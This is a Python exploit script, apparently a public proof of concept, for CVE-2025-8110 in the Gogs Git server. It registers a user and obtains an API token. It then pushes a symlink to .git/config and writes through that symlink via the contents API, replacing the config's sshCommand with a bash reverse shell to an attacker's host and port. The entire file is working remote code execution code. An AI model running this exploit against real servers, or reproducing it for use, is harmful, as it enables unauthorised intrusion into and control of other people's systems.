#!/usr/bin/env python3 import argparse import requests import os import subprocess import shutil import urllib3 from urllib.parse import urlparse import base64 from bs4 import BeautifulSoup from rich.console import Console urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) console = Console() """Exploit script for CVE-2025-8110 in Gogs.""" __author__ = "zAbuQasem" __Linkedin__ = "https://www.linkedin.com/in/zeyad-abulaban/" proxies = { "http": "http://localhost:8080", "https": "http://localhost:8080", } def register(session, base_url, username, password): """Register a new user.""" register_url = f"{base_url}/user/sign_up" resp = session.get(register_url) # Get CSRF token from form csrf = extract_csrf(resp.text) register_data = { "_csrf": csrf, "user_name": username, "email": "zAbuQasem@attacker.com", "password": password, "retype": password, } resp = session.post( register_url, headers={"Content-Type": "application/x-www-form-urlencoded"}, data=register_data, allow_redirects=True, ) if "Username has already been taken." in resp.text: pass # User already exists, continue elif "user/sign_up" in resp.url: console.print(f"[bold red]Registration failed: {resp.status_code}[/bold red]") raise ValueError("Registration failed") console.print("[bold green][+] Registered successfully[/bold green]") return session.cookies def login(session, base_url, username, password): """Authenticate and retrieve CSRF token + session cookie.""" login_url = f"{base_url}/user/login" resp = session.get(login_url) # Get CSRF token from form csrf = extract_csrf(resp.text) login_data = { "_csrf": csrf, "user_name": username, "password": password, } resp = session.post( login_url, headers={"Content-Type": "application/x-www-form-urlencoded"}, data=login_data, allow_redirects=True, ) if "user/login" in resp.url: console.print(f"[bold red]Authentication failed: {resp.status_code}[/bold red]") raise ValueError("Authentication failed") console.print("[bold green][+] Authenticated successfully[/bold green]") return session.cookies def get_application_token(session, base_url): """Retrieve application token from settings.""" settings_url = f"{base_url}/user/settings/applications" # First GET to fetch the page (and CSRF hidden field) before POSTing get_resp = session.get(settings_url, allow_redirects=True) csrf = extract_csrf(get_resp.text) data = {"_csrf": csrf, "name": os.urandom(8).hex()} resp = session.post(settings_url, data=data, allow_redirects=True) console.print(f"[blue]Token generation status: {resp.status_code}[/blue]") soup = BeautifulSoup(resp.text, "html.parser") token_div = soup.find("div", class_="ui info message") if not token_div: raise ValueError("Application token not found") token = token_div.find("p").text.strip() console.print(f"[bold green][+] Application token: {token}[/bold green]") return token def create_malicious_repo(session, base_url, token): """Create a repository with a malicious payload.""" api = f"{base_url}/api/v1/user/repos" repository_name = os.urandom(6).hex() data = { "name": repository_name, "description": "Malicious repo for CVE-2025-8110", "auto_init": True, "readme": "Default", "ssh": True, } session.headers.update({"Authorization": f"token {token}"}) resp = session.post(api, json=data) console.print(f"[blue]Repo creation status: {resp.status_code}[/blue]") return repository_name def upload_malicious_symlink(base_url, username, password, repo_name): """Clone a repo, add a symlink, commit, and push it.""" repo_dir = f"/tmp/{repo_name}" parsed_url = urlparse(base_url) if not parsed_url.scheme or not parsed_url.netloc: raise ValueError("Base URL must include scheme (e.g., http://host)") base_path = parsed_url.path.rstrip("/") clone_cmd = [ "git", "clone", f"{parsed_url.scheme}://{username}:{password}@{parsed_url.netloc}" f"{base_path}/{username}/{repo_name}.git", repo_dir, ] symlink_path = os.path.join(repo_dir, "malicious_link") try: # Clean up if directory already exists if os.path.exists(repo_dir): shutil.rmtree(repo_dir) # Clone repository subprocess.run(clone_cmd, check=True) # Create symlink inside the repo os.symlink(".git/config", symlink_path) # Add, commit, and push subprocess.run( ["git", "add", "malicious_link"], cwd=repo_dir, check=True, ) subprocess.run( ["git", "commit", "-m", "Add malicious symlink"], cwd=repo_dir, check=True, ) subprocess.run( ["git", "push", "origin", "master"], cwd=repo_dir, check=True, ) except subprocess.CalledProcessError as e: raise ValueError(f"Git command failed: {e}") from e except OSError as e: raise ValueError(f"Filesystem operation failed: {e}") from e def exploit(session, base_url, token, username, repo_name, command): """Exploit CVE-2025-8110 to execute arbitrary commands.""" api = f"{base_url}/api/v1/repos/{username}/{repo_name}/contents/malicious_link" data = { "message": "Exploit CVE-2025-8110", "content": base64.b64encode(command.encode()).decode(), } headers = { "Authorization": f"token {token}", "Content-Type": "application/json", } console.print("[bold green][+] Exploit sent, check your listener![/bold green]") session.put(api, json=data, headers=headers, timeout=5) def extract_csrf(html_text): """Parse CSRF token from hidden input; fallback to cookie if present.""" soup = BeautifulSoup(html_text, "html.parser") token_input = soup.select_one("input[name=_csrf]") if token_input and token_input.get("value"): return token_input.get("value") raise ValueError("CSRF token not found in form response") def main(): parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", required=True, help="Gogs base URL") parser.add_argument("-lh", "--host", required=True, help="Attacker host") parser.add_argument("-lp", "--port", required=True, help="Attacker port") parser.add_argument("-x", "--proxy", action="store_true", help="Use proxy") args = parser.parse_args() session = requests.Session() if args.proxy: session.proxies.update(proxies) session.verify = False username = "zAbuQasem" password = "SuperSecurePass123!" command = f"bash -c 'bash -i >& /dev/tcp/{args.host}/{args.port} 0>&1' #" try: register(session, args.url, username, password) login(session, args.url, username, password) token = get_application_token(session, args.url) repo_name = create_malicious_repo(session, args.url, token) git_config = f"""[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true sshCommand = {command} [remote "origin"] url = git@localhost:gogs/{repo_name}.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master """ upload_malicious_symlink(args.url, username, password, repo_name) exploit(session, args.url, token, username, repo_name, git_config) except Exception as e: console.print(f"[bold red][-] Error: {e}[/bold red]") if __name__ == "__main__": main()